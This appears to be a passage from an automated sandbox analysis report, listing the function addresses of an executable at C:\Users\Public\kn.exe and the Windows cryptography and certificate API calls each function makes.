Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A021A4 #360,#359,#357,#357,BCryptFreeBuffer,	6_2_00007FF6A2A021A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A861AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,	6_2_00007FF6A2A861AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A46194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF6A2A46194
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6A2A2417C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,	6_2_00007FF6A2ACA2E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A00300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,	6_2_00007FF6A2A00300
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A8E274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A98298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,	6_2_00007FF6A2A98298
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A82278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF6A2A82278
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A36280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A36280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A607F4 BCryptDestroyKey,#205,#357,	6_2_00007FF6A2A607F4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF6A2A4C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A707D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A707D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A527BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A527BC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29C67CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E6824 CryptHashCertificate,GetLastError,#357,	6_2_00007FF6A29E6824
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A98814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,	6_2_00007FF6A2A98814
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A9A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60740 BCryptCloseAlgorithmProvider,#205,#357,#357,	6_2_00007FF6A2A60740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A607A4 BCryptDestroyHash,#205,#357,	6_2_00007FF6A2A607A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A608EC BCryptGetProperty,#205,#359,#357,#357,	6_2_00007FF6A2A608EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,	6_2_00007FF6A29DA8CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A94914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A94914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,	6_2_00007FF6A2A4E914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60844 BCryptExportKey,#205,#359,#357,#357,	6_2_00007FF6A2A60844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF6A2ACE8B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A225E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF6A2A225E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF6A29EC5D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29F0630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E8600 #357,CryptDecodeObject,GetLastError,LocalFree,	6_2_00007FF6A29E8600
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A665B4 NCryptIsKeyHandle,_CxxThrowException,	6_2_00007FF6A2A665B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF6A2A9A590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,	6_2_00007FF6A2ACA58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,	6_2_00007FF6A2A5E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A026E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,	6_2_00007FF6A2A026E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A966D8 NCryptFreeObject,#360,	6_2_00007FF6A2A966D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A886D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,	6_2_00007FF6A2A886D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A52724 CryptDecodeObject,GetLastError,#357,	6_2_00007FF6A2A52724
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96654 NCryptGetProperty,#360,	6_2_00007FF6A2A96654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,	6_2_00007FF6A2A2A654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A34694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,	6_2_00007FF6A2A34694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,	6_2_00007FF6A29F6694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A90BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,	6_2_00007FF6A2A90BF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A62BC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,	6_2_00007FF6A29FCC24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96C30 NCryptOpenStorageProvider,#360,	6_2_00007FF6A2A96C30
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2ACEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF6A2ACEB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,	6_2_00007FF6A2A8CBB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29ECB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,	6_2_00007FF6A29ECB98
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A90B9C CryptHashData,GetLastError,#357,	6_2_00007FF6A2A90B9C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60B80 NCryptCreatePersistedKey,#205,#359,#359,#357,	6_2_00007FF6A2A60B80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,	6_2_00007FF6A2AB8CF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96CE0 NCryptEnumStorageProviders,#360,	6_2_00007FF6A2A96CE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A24CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,	6_2_00007FF6A2A24CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96D2C NCryptFreeBuffer,#360,	6_2_00007FF6A2A96D2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A22D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A22D18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60D14 NCryptFinalizeKey,#205,#357,#357,	6_2_00007FF6A2A60D14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,	6_2_00007FF6A2A62CFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A52CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,	6_2_00007FF6A2A52CF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A98C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF6A2A98C58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60C3C NCryptExportKey,#205,#359,#359,#357,	6_2_00007FF6A2A60C3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF6A29C6C4C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,	6_2_00007FF6A2A6ACAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A54CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A54CA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96C88 NCryptEnumAlgorithms,#360,	6_2_00007FF6A2A96C88
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,	6_2_00007FF6A2AA4C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,	6_2_00007FF6A2A62C80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6A2A9A9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,	6_2_00007FF6A2A2E9F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A44A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,	6_2_00007FF6A2A44A34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A64A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,	6_2_00007FF6A2A64A1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60A18 BCryptSetProperty,#205,#359,#357,#357,	6_2_00007FF6A2A60A18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,	6_2_00007FF6A2A4AA00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6A29EC960
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A68940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A68940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A6C940
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6099C BCryptOpenAlgorithmProvider,#205,#359,#359,	6_2_00007FF6A2A6099C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A229A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6A2A229A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A92994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF6A2A92994
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,	6_2_00007FF6A2A62AE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60ABC BCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF6A2A60ABC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A02B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,	6_2_00007FF6A2A02B00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A58AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF6A2A58AFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A68AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A68AA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,	6_2_00007FF6A29D6A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF6A2A4EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A92A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,	6_2_00007FF6A2A92A78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A59028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,	6_2_00007FF6A2A59028
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,	6_2_00007FF6A29D7034
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A6301C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF6A29D302F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A67020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A67020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9700C BCryptEnumAlgorithms,#360,	6_2_00007FF6A2A9700C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A8EF74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A50F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF6A2A50F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A44F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF6A2A44F50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60FB4 NCryptOpenKey,#205,#359,#357,#357,	6_2_00007FF6A2A60FB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96FAC BCryptOpenAlgorithmProvider,#360,	6_2_00007FF6A2A96FAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,	6_2_00007FF6A29F4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A610D8 NCryptSetProperty,#205,#359,#357,#359,#357,	6_2_00007FF6A2A610D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A630D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6A2A630D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A970C8 BCryptSetProperty,#360,	6_2_00007FF6A2A970C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A19134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,	6_2_00007FF6A2A19134
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,	6_2_00007FF6A2A8511C
